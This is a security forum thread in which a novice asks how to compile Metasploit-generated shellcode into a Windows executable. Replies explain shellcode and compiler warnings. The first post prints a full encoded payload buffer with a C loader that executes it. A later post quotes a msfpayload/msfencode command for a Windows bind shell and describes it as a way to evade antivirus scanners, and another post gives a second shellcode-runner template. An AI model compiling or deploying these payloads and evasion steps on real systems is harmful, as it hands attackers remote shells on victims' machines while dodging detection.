Results 1 to 9 of 9

Thread: Compile Metasploit payload in C/C++ How?

  1. #1
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    3

    Exclamation Compile Metasploit payload in C/C++ How?

    helo,

    im a noob of compiling metasploit generated payload in c format. and compile it in any windows c/c++ compiler. i tried it in MingGW and borland and visual C. Using this method...

    1. i generate the metasploit payload with a format of C. the result is below:
    unsigned char buf[] =
    "\xdb\xc5\xd9\x74\x24\xf4\x29\xc9\x5f\xbd\x14\x21\ x6c\xf7\xb1"
    "\x45\x83\xc7\x04\x31\x6f\x16\x03\x6f\x16\xe2\xe1\ xdd\x84\x7e"
    "\x09\x1e\x55\xe1\x80\xfb\x64\x33\xf6\x88\xd5\x83\ x7d\xdc\xd5"
    "\x68\xd3\xf5\x6e\x1c\xfb\xfa\xc7\xab\xdd\x35\xd7\ x1d\xe1\x9a"
    "\x1b\x3f\x9d\xe0\x4f\x9f\x9c\x2a\x82\xde\xd9\x57\ x6d\xb2\xb2"
    "\x1c\xdc\x23\xb7\x61\xdd\x42\x17\xee\x5d\x3d\x12\ x31\x29\xf7"
    "\x1d\x62\x82\x8c\x55\x9a\xa8\xcb\x45\x9b\x7d\x08\ xb9\xd2\x0a"
    "\xfb\x4a\xe5\xda\x35\xb3\xd7\x22\x99\x8a\xd7\xae\ xe3\xcb\xd0"
    "\x50\x96\x27\x23\xec\xa1\xfc\x59\x2a\x27\xe0\xfa\ xb9\x9f\xc0"
    "\xfb\x6e\x79\x83\xf0\xdb\x0d\xcb\x14\xdd\xc2\x60\ x20\x56\xe5"
    "\xa6\xa0\x2c\xc2\x62\xe8\xf7\x6b\x33\x54\x59\x93\ x23\x30\x06"
    "\x31\x28\xd3\x53\x43\x73\xbc\x90\x7e\x8b\x3c\xbf\ x09\xf8\x0e"
    "\x60\xa2\x96\x22\xe9\x6c\x61\x44\xc0\xc9\xfd\xbb\ xeb\x29\xd4"
    "\x7f\xbf\x79\x4e\xa9\xc0\x11\x8e\x56\x15\xb5\xde\ xf8\xc6\x76"
    "\x8e\xb8\xb6\x1e\xc4\x36\xe8\x3f\xe7\x9c\x9f\x07\ x7f\xdf\x08"
    "\x86\xf5\xb7\x4a\x89\x1c\xfb\xc2\x6f\x74\xeb\x82\ x38\xe0\x92"
    "\x8e\xb3\x91\x5b\x05\x51\x51\xce\xa2\xf0\x06\x66\ xa9\x25\x60"
    "\x29\x52\x00\xfb\xe0\xc6\xeb\x93\x0c\x07\xec\x63\ x5b\x4d\xec"
    "\x0b\x3b\x35\xbf\x2e\x44\xe0\xc9\x73\xe8\x61\xca\ x25\x5c\x21"
    "\xa2\xcb\xbb\x05\x6d\x34\xee\x97\x51\xe3\xd7\x1d\ xa3\x86\x3b"
    "\xde\x46";
    the result generated code.


    and copy and then paste <framework32>/data/templates/template.c

    but i dont know where to insert. so i tried this method.
    #include <stdio.h>



    unsigned char payload[] =
    "\xdb\xc5\xd9\x74\x24\xf4\x29\xc9\x5f\xbd\x14\x21\ x6c\xf7\xb1"
    "\x45\x83\xc7\x04\x31\x6f\x16\x03\x6f\x16\xe2\xe1\ xdd\x84\x7e"
    "\x09\x1e\x55\xe1\x80\xfb\x64\x33\xf6\x88\xd5\x83\ x7d\xdc\xd5"
    "\x68\xd3\xf5\x6e\x1c\xfb\xfa\xc7\xab\xdd\x35\xd7\ x1d\xe1\x9a"
    "\x1b\x3f\x9d\xe0\x4f\x9f\x9c\x2a\x82\xde\xd9\x57\ x6d\xb2\xb2"
    "\x1c\xdc\x23\xb7\x61\xdd\x42\x17\xee\x5d\x3d\x12\ x31\x29\xf7"
    "\x1d\x62\x82\x8c\x55\x9a\xa8\xcb\x45\x9b\x7d\x08\ xb9\xd2\x0a"
    "\xfb\x4a\xe5\xda\x35\xb3\xd7\x22\x99\x8a\xd7\xae\ xe3\xcb\xd0"
    "\x50\x96\x27\x23\xec\xa1\xfc\x59\x2a\x27\xe0\xfa\ xb9\x9f\xc0"
    "\xfb\x6e\x79\x83\xf0\xdb\x0d\xcb\x14\xdd\xc2\x60\ x20\x56\xe5"
    "\xa6\xa0\x2c\xc2\x62\xe8\xf7\x6b\x33\x54\x59\x93\ x23\x30\x06"
    "\x31\x28\xd3\x53\x43\x73\xbc\x90\x7e\x8b\x3c\xbf\ x09\xf8\x0e"
    "\x60\xa2\x96\x22\xe9\x6c\x61\x44\xc0\xc9\xfd\xbb\ xeb\x29\xd4"
    "\x7f\xbf\x79\x4e\xa9\xc0\x11\x8e\x56\x15\xb5\xde\ xf8\xc6\x76"
    "\x8e\xb8\xb6\x1e\xc4\x36\xe8\x3f\xe7\x9c\x9f\x07\ x7f\xdf\x08"
    "\x86\xf5\xb7\x4a\x89\x1c\xfb\xc2\x6f\x74\xeb\x82\ x38\xe0\x92"
    "\x8e\xb3\x91\x5b\x05\x51\x51\xce\xa2\xf0\x06\x66\ xa9\x25\x60"
    "\x29\x52\x00\xfb\xe0\xc6\xeb\x93\x0c\x07\xec\x63\ x5b\x4d\xec"
    "\x0b\x3b\x35\xbf\x2e\x44\xe0\xc9\x73\xe8\x61\xca\ x25\x5c\x21"
    "\xa2\xcb\xbb\x05\x6d\x34\xee\x97\x51\xe3\xd7\x1d\ xa3\x86\x3b"
    "\xde\x46";
    int main(int argc, char **argv)
    {
    (*(void (*)()) payload)();
    return(0);
    }
    i change "unsigned char buf[] to unsigned char payload[]
    Succesfully compiled but the problem is there is warning: no newline at end of file. and i tried to run... it connects but it stops in "Uploading DLL". Can someone help me about this im totaly a noob.. and trying to learn. Im trying to create/modify the code and compile my own. Thank you very much....

  2. #2
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default

    Try not using the meterpreter payload and see how that goes for you.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  3. #3
    Member
    Join Date
    Jan 2010
    Location
    The new forums
    Posts
    462

    Default

    What are you trying to do? Are you wanting to create a payload from msfpayload in C and add it to a public exploit, or your exploit?

    ex: You found an exploit on milw0rm but want to change the payload.

    Some good info on this thread: http://forums.remote-exploit.org/pen...shellcode.html

  4. #4
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    3

    Default

    Quote Originally Posted by Lincoln View Post
    What are you trying to do? Are you wanting to create a payload from msfpayload in C and add it to a public exploit, or your exploit?
    sort of i think.. i generate a msf payload through msfencode and the ouput is in C. not EXE. so that i can compile it to my own. I get this idea: below

    So, I've seen a few articles pauldotcom (except ours will work encoded) and SANS covering sending a Metasploit payload through scanners and some of the mileage people are seeing. Most have gotten down to around 6 of 36 listed on virustotal.com . I thought I'd give it a go and see for myself. Here's how I got detected by 1 of 36 in one turn.


    Now we use msfpayload piped to msfencode with the ever so popular x86/shikata_ga_nai encoder: Code:
    ./msfpayload windows/shell_bind_tcp LPORT=30000 R | ./msfencode -e x86/shikata_ga_nai c > ~/binder.c



    Now we have our bind shell encoded and waiting in binder.c. From here, you can simply cut and paste this code straight into <framework32>/data/templates/template.c

    Finally, we compile that into a windows executable using Mingw32. Uploading this to virustotal.com showed that AVG was the only scanner to detect our payload.

  5. #5
    Member
    Join Date
    Jan 2010
    Location
    The new forums
    Posts
    462

    Default

    Quote Originally Posted by yyyx_yyyz View Post
    Finally, we compile that into a windows executable using Mingw32
    For the cross compiling check out the last video.

    Up and Running Backtrack 4 - Offensive Security

  6. #6
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default

    Quote Originally Posted by yyyx_yyyz View Post
    sort of i think.. i generate a msf payload through msfencode and the ouput is in C. not EXE. so that i can compile it to my own. I get this idea: below
    What you are seeing in the output of the metasploit command is a c style buffer full of assembly opcodes - its shellcode. You wont be able to change what the payload actually does unless you disassemble the shellcode and modify it in assembler.

    That warning you were getting about "no newline at end of file" isn't serious - its a "warning" which does not stop compilation, as opposed to an "error" which does. You fix it by putting a newline at the end of your c source file.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  7. #7
    Junior Member
    Join Date
    Jan 2010
    Location
    Canada
    Posts
    84

    Default

    No big deal, what you are missing is that shellcode is a self sustained chunck of opcodes that although it runs fine when it gets executed bit by bit, isnt meant to be run as a full program. You have two options if you want to persue this, the hard wayand the easy way.

    The hard way involves editing the shellcode into a full fledged ASM program.

    The easy way invlovles letting the compiler do the work by using the exece() call or by putting the shellcode (once its back in ASM form) in an _asm brace.

  8. #8
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default

    You can also try using the following c code to turn your shellcode into an executable (taken from the Metasploit Windows shellcode site). However (and this is the point I was trying to make before) you're not really gaining anything by creating the code in c format from Metasploit and then compiling into a Windows executable UNLESS you go about changing the shellcode in assembler before you compile. And if you want to learn assembler theres better aproaches to learning it than this.

    Alternatively, if you want to learn how to write this type of code in c start off with a program thats actually written in c.

    Code:
    char shellcode[] =
    "<code_here>";
    
    int main(int argc, char **argv)
    {
      int (*funct)();
      funct = (int (*)()) shellcode;
      (int)(*funct)();
    }
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  9. #9
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    3

    Default

    thanks for the reply and advice.... now i started to research all the advice given here... this is really not easy for me... specially assembly... god bless me....

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •